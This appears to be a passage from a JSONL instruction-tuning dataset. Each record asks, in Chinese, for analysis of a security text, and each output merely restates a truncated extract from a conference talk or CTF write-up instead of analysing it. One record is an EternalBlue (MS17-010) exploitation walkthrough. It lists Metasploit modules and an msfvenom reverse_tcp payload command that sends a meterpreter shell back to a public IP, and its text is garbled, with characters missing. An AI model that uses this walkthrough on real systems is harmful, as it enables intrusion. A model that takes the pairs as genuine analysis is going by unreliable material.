distribution and transmission Operate chemical and nuclear power plants HVAC systems  Heating, Ventilation, Air Conditioning Traffic Signals Mass transit systems Et al.  2007 Security-Assessment.com Some History Real World Examples Accident Worm Outbreak Sabotage Disgruntled Ex-employee These sound familiar?  2007 Security-Assessment.com I was promised some FUD When Good SCADA Goes SERIOUSLY WRONG About 3:28 p.m., Pacific daylight time, on June 10, 1999, a 16- inch-diameter steel pipeline owned by Olympic Pipe Line Company ruptured and released about 237,000 gallons of gasoline into a creek that flowed through Whatcom Falls Park in Bellingham, Washington. About 1.5 hours after the rupture, the gasoline ignited", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nP R O T E C T I N G Y O U R N E T W O R K Patrick DeSantis | @pat_r10t FROM BOX TO BACKDOOR U s i n g O l d S c h o o l To o l s a n d Te c h n i q u e s t o D i s c o v e r B ac k doors in Modern Dev ic es Patrick DeSantis | @pat_r10t OVERVIEW INTRO: WHO, WHAT, WHY MOXA AWK3131A WAP MOXA WAP: ABOUT The AWK-3131A is 802.11n compliant to deliver speed, range, and reliability to support even the most bandwidth-intensive applications. The 802.11n standard incorporates multiple technologies, including Spatial Multiplexing MIMO (Multi-In, Multi-Out), 20 and 40 MHz channels, and dual bands (2.4 GHz and 5 GHz) to provide high speed wireless communication, while still being able to communicate with legacy 802.11a/b/g devices. The AWK's operating temperature ranges from -25 to 60C for standard models and -40 to 75C for wide temperature models, and is rugged enough for all types of harsh industrial environments. Installation of the AWK is easy using DIN-Rail mounting or distribution boxes, and with its wide operating temperature range, IP30-rated housing with LED indicators, and DIN-Rail mounting it is a convenient yet reliable solution for all types of industrial wireless applications. - Moxa MOXA WAP: ABOUT TL;DR  Its an 802.11n Wireless Access Point (WAP)  in a din rail mountable enclosure  many of the the parts inside are the same as in common SOHO networking devices  Moxa advertises that the AWK series is  \"a Perfect Match for Your AGV & AS/RS Systems  Automated Guided Vehicles (AGV)  Automated Storage and Retrieval System (AS/RS)  common in Automated Materials Handling (AMH) systems. MOXA WAP: ABOUT  Its Unbreakable  challenge accepted MOXA WAP: DEVICE LIMITATIONS  Limited to about 8k connections per some unit of time  lots of resource exhaustion DoS issues  throttle traffic or wait for recovery  Crashes a lot  No legit operating system access  Very limited shell environment  most management and configuration done via web app  Crashes A LOT  so many crashes  usually nee", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Token Menace SSO Wars This Photo by Unknown Author is licensed under CC BY > whoarewe  Alvaro Muñoz Security Researcher with Micro Focus Fortify team @Pwntester  Oleksandr Mirosh Security Researcher with Micro Focus Fortify team @OlekMirosh Agenda  Introduction  Delegated Authentication  Authentication Tokens  Arbitrary Constructor Invocation  Potential attack vectors  Dupe Key Confusion  Windows Communication Foundation (WCF)  Windows Identity Foundation (WIF)  SharePoint  Conclusions Introduction This Photo by Unknown Author is licensed under CC BY Delegated Authentication Service Provider Identity Provider User Agent 1 6 Access protected resource Redirect to SSO service Forward Auth token Redirect to resource Access resource Resource Login into SSO service Respond with Auth token 2 3 4 5 7 8 Delegated Authentication Service Provider Identity Provider User Agent 1 6 Access protected resource Redirect to SSO service Forward Auth token Redirect to resource Access resource Resource Login into SSO service Respond with Auth token 2 3 4 5 7 8 Issuer Audience Expire Date Claims Signature Delegated Authentication Service Provider Identity Provider User Agent 1 6 Access protected resource Redirect to SSO service Forward Auth token Redirect to resource Access resource Resource Login into SSO service Respond with Auth token 2 3 4 5 7 8 Issuer Audience Expire Date Claims Signature Potential attack vectors Token parsing vulnerabilities Normally before signature verification Attack Token parsing process Eg: CVE-2019-1083 Signature verification bypasses The holy grail Enable us to tamper claims in the token Eg: CVE-2019-1006 Arbitrary Constructor Invocation CVE-2019-1083 This Photo by Unknown Author is licensed under CC BY JWT token Source: http://jwt.io System.IdentityModel.Tokens.Jwt library // System.IdentityModel.Tokens.X509AsymmetricSecurityKey public override HashAlgorithm GetHashAlgorithmForSignature(string algorithm) { ... object algorithmFromConfig = CryptoHelper.Ge", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## danklang (re, 100p) > if you see this task while scroling > > you have been visited by the reversing task of the 9447 ctf > good flags and points will come to you > > but only if you submit '9447{`dankcode main.dc`}' to this task. > > [main.dc](main.dc) ###PL [ENG](#eng-version) Przepełnione memami zadanie (co widać nawet po wstępie). Dostajemy [długi kod w nieistniejącym języku](main.dc). Ciężko go czytać, więc zaczynamy od przepisania go literalnie do pythona: [main1.py](main1.py). Widać że jest niesamowicie nieoptymalny - więc po prostu uruchomienie kodu main1.py prawdopodobnie nie skończyłoby się za naszego życia (a na pewno nie w trakcie trwania CTFa) Rozpoczynamy rozpoznawanie funkcji które można zoptymalizować: Na przykład to nic innego niż fibonacci(memes) % 987654321 ```python def brotherman(memes): hues = 0 if memes != 0: if memes < 3: return 1 else: wew = brotherman(memes - 1) hues = wew wew = brotherman(memes - 2) hues += wew return hues % 987654321 ``` Jako że maksymalna wartość memes nie jest olbrzymia, możemy po prostu obliczyć wcześniej wszystkie wartości (precomputing): ```python def precompute_fibonacci_mod_987654321(): table = [] N = 13379447+1 result = [0] * N result[1] = 1 for i in xrange(2, N): result[i] = (result[i-2] + result[i-1]) % 987654321 return result precomputed_fibonacci = precompute_fibonacci_mod_987654321() def fibonacci_mod_987654321(number): return precomputed_fibonacci[number] ``` Za to tutaj rozpoznajemy funkcję sprawdzającą czy liczba jest pierwsza: ```python def fail(memes, calcium): dank = True if calcium < memes: if memes % calcium == 0: dank = False else: wew = fail(memes, calcium + 1) dank = wew return dank ``` I przepisujemy ją do takiej postaci: ```python def is_prime(number): if number % 2 == 0: return False else: for divisor in range(3, int(sqrt(number)) + 1, 2): if number % divisor == 0: return False return True ``` Dochodzimy do takiego stanu: [main2.py](main2.py) W tym momencie kończą się oczywiste pomysły na opt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 TEMPEST radio station Paz Hameiri https://il.linkedin.com/in/paz-hameiri-251b11143 Abstract TEMPEST is a cyber security term that refers to the use of electromagnetic energy emissions generated by electronic devices to leak data out of a target device. The attacks may be passive (where the attacker receives the emissions and recovers the data) or active (where the attacker uses dedicated malware to target and emit specific data). In this paper I present a new side channel attack that uses GPU memory transfers to emit electromagnetic waves which are then received and processed by the attacker. Software developed for this work encodes audio on one computer and transmits it to the reception equipment positioned fifty feet away. The signals are received and processed and the audio is decoded and played. The maximum bit rate achieved was 33kbit/s and more than 99% of the packets were received. Frequency selection not only enables maximization of signal quality over distance, but also enables the attacker to receive signals from a specific computer when several computers in the area are active. The software developed demonstrates audio packets transfers, but other types of digital data may be transmitted using the same technique. Introduction Electronic circuits emit electromagnetic waves. Copper traces on printed circuit boards and wires act like antennas as they emit electromagnetic waves generated by the electric current flowing through the conductors. TEMPEST (Telecommunications Electronics Materials Protected from Emanating Spurious Transmissions) is a U.S. National Security Agency (NSA) specification and a NATO certification. The acronym refers to information leakage from a system through unintentional radio signals, audio signals, electrical signals, etc. TEMPEST attacks were brought to public attention by Eck [1] in 1985. In a later work by Kuhn and Anderson [2], techniques that enable software to use the video card to control electromagnetic radiation emitted f", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n09/07/09 ken@ipl31.net 1 Fear and Loathing in Community Wireless Networks Ken Caruso  Co-Founder Seattlewireless.net, Freenetworks.org 09/07/09 ken@ipl31.net 2 Notice to CD Users  If you are reading this off of the CD, please note that I have a lot of info in the speakers notes, I like to keep the slides terse, and put most of what I will discuss in the speakers notes of the PowerPoint. Also check to see if a newer revision of the slide deck has been released 09/07/09 ken@ipl31.net 3 Freenetworks?  Open peering/free transit  Put up a node start routing packets  Community Wireless Networks  Free as in speech 09/07/09 ken@ipl31.net 4 09/07/09 ken@ipl31.net 5 Different Approaches  For some the current mission is free public Internet Access  For some the mission is to build Infrastructure that is completely community owned, does not rely on existing Telco lines, and may not necessarily provide Internet access 09/07/09 ken@ipl31.net 6 09/07/09 ken@ipl31.net 7 Why is this happening?  Standards based technology is finally available  Extremely inexpensive gear  Growing desire for connectivity anywhere  Techies/Hackers feel like they are being screwed over by ISPs  Think BBS, Fidonet etc... (Geeks like to connect computers together) 09/07/09 ken@ipl31.net 8 09/07/09 ken@ipl31.net 9 Foe?  ISPs providing all you can eat have already been feeling the burn  Where is 3g?  WISPs are possibly concerned about crowded bands  Pringles Can-tennas are not FCC certified 09/07/09 ken@ipl31.net 10 09/07/09 ken@ipl31.net 11 Friend?  Yet another thing for ISPs to complain about  Geek community is always pissed off at the Telco  Media loves the controversy 09/07/09 ken@ipl31.net 12 09/07/09 ken@ipl31.net 13 Confusion  Why would anyone do anything for free?  Venture Capitalists want to know the secret plan?  Who pays for it?  Will this hurt or hinder other models 09/07/09 ken@ipl31.net 14 09/07/09 ken@ipl31.net 15 Privacy  Decentralization of network ownership  Harder to get aggregate inspecti", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nwhoami Maggie Jauregui @magsjauregui Ideas/research my own Story time! Supply Acquisition Circuit Interrupts around the house  Purposes GFCI: Intends to prevent Electric Shock AFCI: Intends to prevent fires Code Requirements GFCIs  Bathrooms/Indoor wet locations  Garages/storage areas/non habitable areas/unfinished basements  Outdoors/Compartments accessible from outside the unit/Rooftops/Pools/Hot tubs  Crawl spaces at or below grade level  Kitchen [dish washer, Refrigerator]  Laundry Areas AFCIs  Kitchens  Family Rooms  Dining Rooms  Living Rooms  Parlors  Libraries  Dens  Bed rooms  Sun rooms  Recreation Rooms  Closets/Hallways  Laundry Areas  Or similar rooms Ground Fault Circuit Interrupt GFCI 5-30 mA 25-40 ms Solenoid GFI Demos Magic Smoke - Closed https://www.youtube.com/watch?v=wdIDoE3rV9M Internal Spark https://www.youtube.com/watch?v=E-fKU9MvDjg Close range Outlet trip https://www.youtube.com/watch?v=21UeF_cHRxU Close range Outlet trip https://www.youtube.com/watch?v=7yw-DV2URE0 GFCI Outlet Trip through RF https://www.youtube.com/watch?v=IpzHTYNK52Y Across Walls https://www.youtube.com/watch?v=30t50Hs0pZM Remote https://www.youtube.com/watch?v=fKxL1MMLe0I Magic smoke https://www.youtube.com/watch?v=Nt6HiCsAKhw Flaming flying components https://www.youtube.com/watch?v=S16zuJACdds Result Fried GFCI https://www.youtube.com/watch?v=dnIJeaKOugc AFCI Breakers vs. HAM Radio https://www.youtube.com/watch?v=JsILD0Fce1s 0:22 & 5:47 AFCI Breakers vs. HAM Radio http://www.arrl.org/news/arrl-helps-manufacturer-to-resolve-arc-fault-circuit-interrupter-rfi-problems So whats going on? Electromagnetism Resonance  Defined by: Resistance, Inductance & Capacitance A coil will resonate to its fundamental frequency (or harmonics) US AC works @ 60 Hz Low Power GFI SCRs Silicone Controlled Rectifiers Ceramic Capacitor  0.01 uF  Overheating, over current, short-circuit GFI Power Outlets Patents Certificate Link US5943199 A https://www.google.com/patents/US5943199?dq=5943199&hl=en&", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nScott Wolchok Spying the World from Your Laptop @ LEET Crawl Pirate Bay, scrape trackers Tracked downloads for millions of IPs TPB added magnet links last year No more .torrent files; get data from DHT no central tracker that can be down dont need to rely on a single server http://thepiratebay.org/blog/175 DHT crawling presents challenges and opportunities for torrent downloaders Uses for crawling: *AA can track users & torrents Pirates can build search engines overnight! Whats a BitTorrent DHT? List of trackers (servers) in the .torrent file Torrent client sends announce to tracker Tracker notes youre there & sends back peers Example: tracker.openbittorrent.com Trackers tend to go down (read: get sued) Want something more reliable Solution: distributed hash tables (DHTs) P2P network that stores key-value pairs DHT DHT[One] = 1 GET DHT[Two] 2 Peers & data have 160-bit IDs Peer ID: random Data ID: SHA-1 hash Peers store data with similar IDs PING STORE(key, value) FIND_NODE(id)  returns k closest peers (apply repeatedly) FIND_VALUE(key)  like FIND_NODE, but returns value if known Replace the tracker with a DHT DHT GET DHT[0x12AB] [127.0.0.1:31337, 10.0.0.1:80] DHT[0x12AB].add(1.2.3.4:6881) magnet:?xt=urn:btih:cfa86e0e8f3831c24120b7f ee7413b4da31ee748&dn=Linux+Mint+9.0+x8 Link straight to files, no .torrent (btih=infohash) Find peers from DHT, fetch .torrent from them Why? Legal shenanigans Two DHTs; 1 for Vuze, 1 for everyone else Only cover Vuze in this talk to keep it simple Should be possible to crawl Mainline as well Reimplemented the Vuze protocol in C Sybil attack: simulate 1000+ clients at once Just sit and wait for values to come in Cheaply captures 90%-99% of the DHT Defeating Vanish with Low-Cost Sybil Attacks Against Large DHTs Crawl: download torrent data from DHT (filenames, sizes, peers) Index and search: import into PostgreSQL, use its keyword search against filenames Rank results by popularity  weve got lists of downloaders, so count them! Problem: DH", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n##Caesar (Crypto, 400p) Some one was here, some one had breached the security and had infiltrated here. All the evidences are touched, Logs are altered, records are modified with key as a text from book. The Operation was as smooth as CAESAR had Conquested Gaul. After analysing the evidence we have some extracts of texts in a file. We need the title of the book back, but unfortunately we only have a portion of it... ###PL [ENG](#eng-version) Dostajemy [plik](The_extract.txt) a z treści zadania wynika, że może być on szyfrowany za pomocą szyfru Cezara. Uruchamiamy więc prosty skrypt: ```python import codecs with codecs.open(\"The_extract.txt\") as input_file: data = input_file.read() for i in range(26): text = \"\" for x in data: c = ord(x) if ord('a') <= c < ord('z'): text += chr((c - ord('a') + i) % 26 + ord('a')) elif ord('A') <= c < ord('Z'): text += chr((c - ord('A') + i) % 26 + ord('A')) else: text += chr(c) print(text) ``` Który wypisuje wszystkie możliwe dekodowania, wśród których mamy: Dr. Sarah Tu races against time to block the most dangerous Internet malware ever created, a botnet called QUALNTO. While Sarah is closed off in her comzuter lab, her sister, Hanna, is brutally attacked and left in a coma. As Sarah reels with guilt over not being there for her sister, a web of deceztion closes in, threatening her and everyone she loves. Hannas condition is misleading. In her coma state, she is able to build a zsychic bridge with FBI Szecial Agent Jason McNeil. Her cryztic messages zlague Jason to keez Sarah safe. Tough and street-smart Jason McNeil doesnt believe in visions or telezathic messages, and he fights the voice inside his head. His first imzression of Dr. Sarah Tu is another stiletto wearing ice-dragon on the war zathuntil he witnesses her façade crumble after seeing her sisters bloody, tortured body. Jasons zrotective instinct kicks in. He falls for Sarahhard. When an extremenly dangerous arms dealer and cybercriminal discovers that Sarah blocked his bo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n云环境自动化入侵溯源实战 徐越 阿里云安全工程师 WHOAMI 2015 2016 2019  @cdxy_  安全工程师@阿里云  企业安全/入侵检测与响应  数据分析/机器学习爱好者 响应速度是企业安全能力的核心体现 是否误报 漏洞攻击路线 黑客背景目的 影响哪些资产和账号 泄露哪些数据 是否存在内部违规操作 ... 告警 安全运营 看看怎么被入侵的 200G 日志 0 日志 看看怎么被入侵的 99% 误报 又来告警了 安全运营现状 安全运营流程中的技术问题 数据缺失 系统孤立 人工检索 [ 自动化入侵回溯 ] 多源异构数据的知识表达 采集 计算 交互 云原生的数据采集方案 满足90%以上事件调查 千万级RPS实时流计算 自动寻找入侵相关信息 图结构可视化 还原入侵链路 可视化 冗余 只展示有用的信息 数十种行为细节 粗糙 离线 分钟级延时 计算流程 将行为抽象成实体描述入侵细节 黑客IP: x.x.x.x 服务器IP: x.x.x.x 攻击 黑客IP: x.x.x.x 服务器IP: x.x.x.x 漏洞利用 执行恶意指令 写入文件 告警 基于日志的被动关系构建 主动关系推理 断链修复关联规则挖掘 watchbog 蠕虫回溯案例 JIRA模板注入(CVE-2019-11581) Solr RCE(CVE-2017-12629) SSH暴力破解 CouchDB RCE(CVE-2018-8007) 挖矿程序植入方式Top  SSH/RDP登录后写入  WebLogic RCE  Kubernetes API Server未授权访问  Struts2 RCE  Hadoop YARN 未授权访问 WEBSHELL植入方式Top  表单文件上传  老马上传新马  WordPress插件写入  SSH/RDP登录后写入  Discuz插件写入 宏观入侵原因统计 自动化0day捕获 Jenkins RCE (CVE-2019-1003000) 2019-01-30 15:45:22 - 115.236.5.58 WebLogic RCE (CVE-2019-2725) 2019-04-17 18:09:45 - 211.94.162.245 04-17 01-30 现阶段问题 数据 复杂网络拓扑/内网 计算 长时间窗口/复杂模型 对抗 Agent被杀或定向绕过 Q&A cdxy000 cdxy_", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBuilding a Public RPZ Service to Protect the Worlds Consumers John Bambenek, Manager of Threat Systems Fidelis Cybersecurity The content of this presentation can be considered TLP:WHITE. I will identify any specific data points I discuss that are more sensitive and shouldnt be disclosed as we go.  Fidelis Cybersecurity Introduction  Manager of Threat Systems with Fidelis Cybersecurity  Part-Time Faculty at University of Illinois in CS  Handler at the SANS Internet Storm Center  Provider of open-source intelligence feeds DGAs!   Run several takedown oriented groups and surveil threats 2  Fidelis Cybersecurity The Problem Illustrated (from Virustotal) 3  Fidelis Cybersecurity The Reality  There is a much smaller set of actual malware tools, EKs, and criminal service providers.  Problem: Most cybercrime impacts consumer networks that are unprotected by security vendors, enterprise SOCs, etc.  Consumers generally will not secure their devices, pay for security, or clean up malware infections except in rate cases. 4  Fidelis Cybersecurity Good News  We have tons of open-source data, blocklists, and tracking systems out there publishing near-time data on threats.  My DGA feeds  Malware Domains  Abuse.ch trackers  Phishtank  Literally hundreds more (and thats just Western ones) 5  Fidelis Cybersecurity Requirements to Protect Consumers  Must have no or extremely low false positives  Compromised websites  Shared hosting  Must not impact the user experience  Must not increase cost  Must be automated to deploy/update  Ideally include some ability for security awareness of infected users 6  Fidelis Cybersecurity Two Partial Solutions  Almost all malware requires DNS at some point in the flow of traffic.  Every piece of malware wants to talk somewhere.  Solution:  RPZ  Auto-generated Firewall Rules 7  Fidelis Cybersecurity RPZ Primer  DNS Response Policy Zones are, in essence, a DNS firewall. On a resolver, you create zone files for things you want to protect constituents from.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nModScan A SCADA MODBUS Network Scanner Mark Bristow mark.bristow@gmail.com Agenda  Brief introduction to SCADA Systems  The MODBUS Protocol  MODBUS TCP  ModScan Demonstration  ModScan Project Information  Q&A Disclaimer  The material in this presentation is to be used for authorized security scanning/ auditing  If you do something stupid with the information I present here, dont blame me What is SCADA?  Supervisory Control And Data Acquisition is a system that centrally gathers data in real time from local and remote locations in order to control equipment and conditions.  Commonly also referred to as Industrial Control Systems (ICS), which is not accurate but close Where is SCADA?  Power Generation/Transmission  Water Treatment/Distribution  Pipelines  Traffic Control Systems  Manufacturing Facilities  National Infrastructure  Communications SCADA Architecture What is ModScan?  ModScan is a tool to detect open MODBUS/TCP ports and identify device Slave IDs associated with IP addresses  ModScan is designed for an administrator or security auditor to be able to accurately reconnoiter a MODBUS/TCP network The MODBUS Protocol  About the Protocol  Developed in 1979 by Modicon  Free and Open Source  The most common protocol found in SCADA and ICS networks  Default port 503  Flavors  Modbus RTU - Compact Binary  Modbus ASCII - Human readable MODBUS Packet Construction  Valid Function codes are 1-127  256 byte maximum packet size  Big-Endian encoding  Error Check is CRC/LRC Data Slave ID Fn Code 1 byte 1 byte 252 byte max Error Chk 2 bytes 256 byte max ADU PDU ADU: Application Data Unit PDU: Protocol Data Unit Typical Communication  Modbus is a Master/Slave Serial Protocol  Only Masters can initiate conversation Master Slave Initiate Request Execute Command Initiate Response Receive Response Data SID Fn Ec Data SID Fn Ec Error Communication  Error Function = 0x80 + Function Code  Error Codes defined in specification Master Slave Initiate Request Error Detected Report Error Re", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 MSNV-LNL LxLL 简介 LxLN 漏洞检测 Nmsf O具 LxLO 漏洞利 Nmsf exploit/windows/smb/msNV_LNL_eternalblue auxiliary/admin/smb/msNV_LNL_command O原py P其他具 EternalPulse 界化具 永恒之蓝漏洞是程式组织在其漏洞利框架中个针对 SMB服务 进攻击的漏洞该漏洞导致攻击者 在标系统上可以执任意代码 内中常遇懂得都懂本总结了些检测和利的法 msf 有个模块 auxiliary/scanner/smb/smb_ms17_010 可以进 单IP / IP段 的 17010 检 测 0x00 简介 0x01 漏洞检测 1msf 2 有很多监测具挑顺的就了 sharpSMBScan 公司佬写的 Ladon K8gege 写的内信息搜集具不只限于 17010 2具 1 C:\\Users\\root\\Desktop\\>SharpSMBScan.exe -h 2 赛克君 3 IP : SharpSMBScan.exe 192.168.1.1 4 IPS : SharpSMBScan.exe -CIP 192.168.1.1 1 Ladon.exe 192.168.37.1/24 ScanType MS17010 3 msf多个模块可以尝试利 优点是不需要匿名管道但容易造成蓝屏 当前测试版本 windows server 2008 R2 x64 0x02 漏洞利 1msf exploit/windows/smb/ms17_010_eternalblue 4 可以本地打到vps上 VPS 开监听 5 本地 将 LHOST 设置我们 vps 的 IP 6 看到我们 vps 弹回 meterpreter 后就把本地的掐掉不然让他继续打可能就打蓝屏了 7 执命令的模块优点是不会蓝屏但是需要匿名管道 exploit/windows/smb/ms17_010_psexec 同这个模块都需要匿名管道 当前测试版本 windows server 2008 R2 x64 auxiliary/admin/smb/ms17_010_command 8 程式具来 NAS 武器库最稳定需要 python 2.6 环境 当前测试版本 windows 7 sp1 x86 1. 成后件 利 msfvenom 成 dll 件 2原py 1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.100.119.27 LP ORT=12121 -f dll >17010.dll 9 2. 打开监听 选择对应的payload开监听就完事了 3. 原 py 打 17010 10 启动原 py 件注意需要 python2.6 的环境 这设置 target ip 设置为有漏洞的标我新建了个项 1 [?] Default Target IP Address [] : 192.168.37.5 11 选择 Eternalblue 模块植后路回 2 [?] Default Callback IP Address [] : 192.168.37.4 3 [?] Use Redirection [yes] : no 4 5 [?] Base Log directory [D:\\logs] : 6 [*] Checking D:\\logs for projects 7 [!] Access Denied to 'D:\\logs'! Choose a different log directory. 8 9 [?] Base Log directory [D:\\logs] : C:\\Users\\root\\Desktop\\17010\\17 010\\shadowbroker\\windows\\logs 10 [*] Checking C:\\Users\\root\\Desktop\\17010\\17010\\shadowbroker\\windo ws\\logs for projects 11 Index Project 12 ----- ------- 13 0 Create a New Project 14 15 [?] Project [0] : 0 16 [?] New Project Name : 17010 17 [?] Set target log directory to 'C:\\Users\\root\\Desktop\\17010\\1701 0\\shadowbroker\\windows\\logs\\17010\\z192.168.37.5'? [Yes] : 18 19 [*] Initializing Global State 20 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Reversing-II 100 (NES reverse engineering) We are provided with a NES ROM (`impossible_game.nes`). The goal is simple - find a cheat code for walking through walls. The hints explain that we should flip only one bit in a data section of the ROM. We would ideally avoid reversing the entire game, as that would take forever - especially for a 100 point challenge. I decided to instrument an emulator to find the instructions responsible for handling the collision. After failing to figure out how to open a ROM in higan, I cloned the source for FCEUX. As the emulator is available in `nixpkgs`, building it was a piece of cake: ```shell [~/ctf/2020/trendmicro/nes-re/fceux]$ nix-shell '<nixpkgs>' -A fceux [nix-shell:~/ctf/2020/trendmicro/nes-re/fceux]$ $buildPhase ``` (unfortunately this includes a non-idempotent patch to `SConstruct`, repeated builds had to be done with `git checkout SConstruct;$buildPhase`) Some strategic source spelunking quickly lead me to the code responsible for dispatching an instruction: ```cpp // x6502.cpp, in X6502_Run, around line 490 IncrementInstructionsCounters(); _PI=_P; b1=RdMem(_PC); ADDCYC(CycTable[b1]); ``` I added some quick-n-dirty logging to print a line each time an instruction at a specific address is reached for the first time: ```diff // x6502.cpp, in X6502_Run, around line 490 IncrementInstructionsCounters(); _PI=_P; + static bool seenPC[0x10000] = {0}; + if (!seenPC[_PC]) { + printf(\"New PC: 0x%04x\\n\", _PC); + seenPC[_PC]=1; + } b1=RdMem(_PC); ADDCYC(CycTable[b1]); ``` I recompiled the emulator and fired up the game, fully prepared to get spammed by a large amount of output. I made sure to move my character both ways, but avoid colliding with the wall. Then, I applied the age-old technique of marking a point in the output of a CLI program by pressing Enter a few times and finally walked into the wall. This yielded the following, quite short output: ``` New PC: 0x94af New PC: 0x94b1 New PC: 0x92d7 New PC: 0x92d9 New PC: 0x9309 New", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n目 录 版权信息 版权 内容提要 历史回眸 第2版前言 第1版前言 资源与支持 第一篇 绪 论 第1章 软件调试基础 1.1 简介 1.1.1 定义 1.1.2 基本过程 1.2 基本特征 1.2.1 难度大 1.2.2 难以估计完成时间 1.2.3 广泛的关联性 1.3 简要历史 1.3.1 单步执行 1.3.2 断点指令 1.3.3 分支监视 1.4 分类 1.4.1 按调试目标的系统环境分类 1.4.2 按目标代码的执行方式分类 1.4.3 按目标代码的执行模式分类 1.4.4 按软件所处的阶段分类 1.4.5 按调试器与调试目标的相对位置分类 1.4.6 按调试目标的活动性分类 1.4.7 按调试工具分类 1.5 调试技术概览 1.5.1 断点 1.5.2 单步执行 1.5.3 输出调试信息 1.5.4 日志 1.5.5 事件追踪 1.5.6 转储文件 1.5.7 栈回溯 1.5.8 反汇编 1.5.9 观察和修改内存数据 1.5.10 控制被调试进程和线程 1.6 错误与缺欠 1.6.1 内因与表象 1.6.2 谁的bug 1.6.3 bug的生命周期 1.6.4 软件错误的开支曲线 1.7 重要性 1.7.1 调试与编码的关系 1.7.2 调试与测试的关系 1.7.3 调试与逆向工程的关系 1.7.4 学习调试技术的意义 1.7.5 调试技术尚未得到应有的重视 1.8 本章小结 参考资料 第二篇 CPU及其调试设施 第2章 CPU基础 2.1 指令和指令集 2.1.1 基本特征 2.1.2 寻址方式 2.1.3 指令的执行过程 2.2 英特尔架构处理器 2.2.1 80386处理器 2.2.2 80486处理器 2.2.3 奔腾处理器 2.2.4 P6系列处理器 2.2.5 奔腾4处理器 2.2.6 Core 2系列处理器 2.2.7 Nehalem微架构 2.2.8 Sandy Bridge微架构 2.2.9 Ivy Bridge微架构 2.2.10 Haswell微架构 2.2.11 Broadwell微架构 2.2.12 Skylake微架构 2.2.13 Kaby Lake微架构 2.3 CPU的操作模式 2.4 寄存器 2.4.1 通用数据寄存器 2.4.2 标志寄存器 2.4.3 MSR寄存器 2.4.4 控制寄存器 2.4.5 其他寄存器 2.4.6 64位模式时的寄存器 2.5 理解保护模式 2.5.1 任务间的保护机制 2.5.2 任务内的保护 2.5.3 特权级 2.5.4 特权指令 2.6 段机制 2.6.1 段描述符 2.6.2 描述符表 2.6.3 段选择子 2.6.4 观察段寄存器 2.7 分页机制 2.7.1 32位经典分页 2.7.2 PAE分页 2.7.3 IA-32e分页 2.7.4 大内存页 2.7.5 WinDBG的有关命令 2.8 PC系统概貌 2.9 ARM架构基础 2.9.1 ARM的多重含义 2.9.2 主要版本 2.9.3 操作模式和状态 2.9.4 32位架构核心寄存器 2.9.5 协处理器 2.9.6 虚拟内存管理 2.9.7 伪段支持 2.9.8 64位ARM架构 2.10 本章小结 参考资料 第3章 中断和异常 3.1 概念和差异 3.1.1 中断 3.1.2 异常 3.1.3 比较 3.2 异常的分类 3.2.1 错误类异常 3.2.2 陷阱类异常 3.2.3 中止类异常 3.3 异常例析 3.3.1 列表 3.3.2 错误代码 3.3.3 示例 3.4 中断/异常的优先级 3.5 中断/异常处理 3.5.1 实模式 3.5.2 保护模式 3.5.3 IA-32e模式 3.6 ARM架构中的异常机制 3.7 本章小结 参考资料 第4章 断点和单步执行 4.1 软件断点 4.1.1 INT 3 4.1.2 在调试器中设置断点 4.1.3 断点命中 4.1.4 恢复执行 4.1.5 特殊用途 4.1.6 断点API 4.1.7 系统对INT 3的优待 4.1.8 观察调试器写入的INT 3指令 4.1.9 归纳和提示 4.2 硬件断点 4.2.1 调试寄存器概览 4.2.2 调试地址寄存器 4.2.3 调试控制寄存器 4.2.4 指令断点 4.2.5 调试异常 4.2.6 调试状态寄存器 4.2.7 示例 4.2.8 硬件断点的设置方法 4.2.9 归纳 4.3 陷阱标志 4.3.1 单步执行标志 4.3.2 高级语言的单步执行 4.3.3 任务状态段陷阱标志 4.3.4 按分支单步执行标志 4.4 实模式调试器例析 4.4.1 Debug.exe 4.4.2 8086 Monitor 4.4.3 关键实现 4.5 反调试示例 4.6 ARM架构的断点支持 4", "category": "text_analysis", "source": "security_papers"}
